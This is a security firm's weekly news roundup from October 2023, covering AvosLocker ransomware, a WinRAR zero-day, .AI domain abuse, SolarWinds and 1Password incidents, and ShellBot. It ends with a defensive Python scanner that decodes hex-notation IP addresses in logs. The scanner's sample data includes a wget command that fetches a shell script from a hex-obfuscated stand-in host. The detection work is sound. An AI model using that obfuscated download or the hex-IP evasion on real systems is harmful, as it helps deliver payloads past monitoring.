Network Security News | Ingalls Information Security

Articles of interest from the week of October 23, 2023

Written by John Frasier | Oct 23, 2023 4:00:00 AM

FBI, CISA Warn of Rising AvosLocker Ransomware Attacks Against Critical Infrastructure

The AvosLocker ransomware gang has been linked to attacks against critical infrastructure sectors in the U.S., with some of them detected as recently as May 2023. That's according to a new joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) detailing the ransomware-as-a-service (RaaS) operation's tactics, techniques, and procedures (TTPs). (The Hacker News)


The barrier for new and emerging threat actors to cross to become proficient or even moderately capable has diminished significantly. While their techniques and capabilities are limited, they are much more focused on smash-and-grab techniques to exploit vulnerabilities and deploy their ransomware.

While this type of activity is increasing, the vast majority of incidents are due to larger, more sophisticated groups exploiting unmanaged devices and applications within corporate networks as well as capitalizing on living-off-the-land techniques to further mask the threat actor’s presence in the environment. That being said, maintaining a proper and concise inventory of devices and applications that are approved and ensuring proper patching is paramount to limit the potential of compromise.

Craig Flynn, SOC Analyst Lead at Ingalls Information Security


State-Sponsored APTs Are Leveraging WinRAR Bug

CVE-2023-38831 was patched in August 2023, along with another high-severity RCE vulnerability (CVE-2023-40477). Exploited as a zero-day by cybercriminals since April 2023, the vulnerability is now also being used by state-sponsored hacking groups. (Help Net Security)


Cybercriminals Register .AI Domains of Trusted Brands for Malicious Activity

Third parties are registering brands under the .AI domain to launch phishing attacks or other types of brand abuse. Almost half of Forbes Global 2000 companies do not have control over their branded artificial intelligence (.AI) domain names, which are registered by third parties. That's according to the 2023 Domain Security Report from CSC, which revealed that cybercriminals are exploiting AI's popularity by attempting to register the domains of trusted brands for malicious activity. This is emphasized by a 350% year-over-year increase in domain dispute cases involving .AI extensions in 2023 from companies who discovered that .AI domains using their brands were misappropriated by third parties, according to the research. (CSO)


Critical SolarWinds RCE Bugs Enable Unauthorized Network Takeover

Eight newly discovered vulnerabilities in the SolarWinds Access Rights Manager Tool (ARM) — including three deemed to be of critical severity — could open the door for attackers to gain the highest levels of privilege in any unpatched systems. (Dark Reading)


1Password Discloses Security Incident Linked to Okta Breach

On October 23, 2023, 1Password’s CTO, Pedro Canahuati, disclosed the incident, stating that threat actors were unable to access or steal user data during the attack. (HACKREAD)


ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers

The threat actors behind ShellBot are leveraging IP addresses transformed into their hexadecimal notation to infiltrate poorly managed Linux SSH servers and deploy the DDoS malware. (The Hacker News)
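Detection-side note on the hex-notation trick: naive log rules that look for dotted-decimal addresses miss literals such as a single 32-bit hex integer or four hex octets joined by dots, both of which Linux tools resolve as ordinary IPv4 addresses. The scanner below is an added example (not code from the article or from the ShellBot researchers); the sample log lines and the two obfuscation forms it handles are constructed assumptions.

```python
import re
import ipaddress
from typing import Optional

# Constructed sample log lines (not from the article): a download command and
# an SSH auth event that carry hex-notation IP literals, plus a plain one.
SAMPLE_LINES = [
    "wget http://0xcb007107/x.sh -O /tmp/x.sh",
    "Accepted password for root from 0xc0.0xa8.0x1.0x9 port 4412 ssh2",
    "curl http://203.0.113.7/ok.txt",  # dotted-decimal: not an obfuscation hit
]

# Two assumed forms: four dotted hex octets (tried first) or one hex integer
# of up to 32 bits. The lookarounds stop partial matches inside longer tokens.
HEX_IP_RE = re.compile(
    r"(?<![\w.])(0x[0-9a-fA-F]{1,2}(?:\.0x[0-9a-fA-F]{1,2}){3}"
    r"|0x[0-9a-fA-F]{1,8})(?![\w.])"
)


def decode_hex_ip(token: str) -> Optional[str]:
    """Return the dotted-decimal form of a hex-notation IPv4 literal,
    or None if the token does not decode to a valid address."""
    try:
        if "." in token:
            octets = [int(part, 16) for part in token.split(".")]
            if len(octets) != 4 or any(o > 255 for o in octets):
                return None
            return ".".join(str(o) for o in octets)
        value = int(token, 16)  # int() accepts the 0x prefix with base 16
        if value > 0xFFFFFFFF:
            return None
        return str(ipaddress.IPv4Address(value))
    except ValueError:
        return None


def find_obfuscated_ips(lines):
    """Scan log lines for hex-notation IP literals and return
    (line_number, raw_token, decoded_ip) tuples for analyst review."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in HEX_IP_RE.finditer(line):
            decoded = decode_hex_ip(match.group(0))
            if decoded is not None:
                hits.append((number, match.group(0), decoded))
    return hits


if __name__ == "__main__":
    for hit in find_obfuscated_ips(SAMPLE_LINES):
        print("line %d: %s -> %s" % hit)
```

Feeding the decoded address into the same blocklist or reputation lookup used for dotted-decimal literals closes the gap the obfuscation relies on.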